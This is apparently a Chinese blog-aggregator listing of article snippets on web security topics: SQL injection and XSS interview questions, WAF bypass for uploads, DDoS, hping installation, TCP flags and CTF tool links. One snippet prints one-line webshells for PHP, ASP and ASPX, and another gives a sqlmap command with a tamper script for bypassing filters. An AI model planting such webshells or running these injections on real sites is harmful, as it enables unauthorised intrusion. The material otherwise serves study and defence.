初面: SQL注入 (1)如何判断一个页面存在SQL注入,有哪些方法 (2)针对具体数据库如何进行注入,如access,sqlserver,mysql,oracle,mongodb,Nosql (3)碰到有Waf的情况如何绕过,有哪些绕过手段 XSS (1)XSS分类 (2)Dom型XSS应用场景 ...
分类:
其他好文 时间:
2019-09-10 19:38:26
阅读次数:
115
Access 绕过: sqlmap.py -u http://www.xx.com/project.asp?id=29 --tables --tamper space2plus.py ...
分类:
其他好文 时间:
2019-09-06 12:30:04
阅读次数:
375
(1).DDos概念 分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这 ...
分类:
其他好文 时间:
2019-09-01 16:50:30
阅读次数:
179
CentOS 7.6.1810 安装hping 3.0 1、创建本地安装目录 2、下载并解压 3、安装依赖包 4、设置软连接 5、进行安装 6、测试查询版本 其它参考 ...
分类:
其他好文 时间:
2019-08-29 18:37:51
阅读次数:
176
上传绕过WAF的一些常用方法 0X01姿势总结 (1)fuzz文件名后缀方法用burpsuite进行模糊测试,寻找黑名单之外的文件(2)windows系统可以进行后缀修改如:webshell.php……………..(3)路径绕过:有些WAF只会监视某个目录是否被上传webshell(4)大小写组合如: ...
分类:
其他好文 时间:
2019-08-24 22:59:19
阅读次数:
223
前言 确认位ACK 只有当ACK=1时确认号字段才有效。当ACK=0时,确认号无效 TCP规定,在连接建立后所有传送的报文段都必须把ACK置1 同步位SYN 同步SYN=1表示这是一个连接请求或者连接接收报文 当SYN=1,ACK=0时,表明这是一个连接请求报文,对方若同意建立连接,则在响应报文中使 ...
分类:
其他好文 时间:
2019-08-19 20:45:27
阅读次数:
135
转自:https://www.jianshu.com/p/fb63bb254655 地址:https://www.wafunny.com/blog/go/goreplay.html ...
分类:
移动开发 时间:
2019-08-19 17:12:04
阅读次数:
85
php <?php @eval($_post['pass']);?> asp <%eval request ("pass")%> aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 防御 代码中过滤。 ...
分类:
其他好文 时间:
2019-08-17 17:48:05
阅读次数:
112
Bugku-Tool https://tool.bugku.com/?wafcloud=1 https://www.ctftools.com/ http://tool.oschina.net/encrypt?type=3 http://tool.oschina.net/ http://ctf.ssl ...
分类:
其他好文 时间:
2019-08-17 17:45:51
阅读次数:
430
安装 使用说明 免杀 array_map | assert ...
分类:
其他好文 时间:
2019-08-15 11:20:28
阅读次数:
110
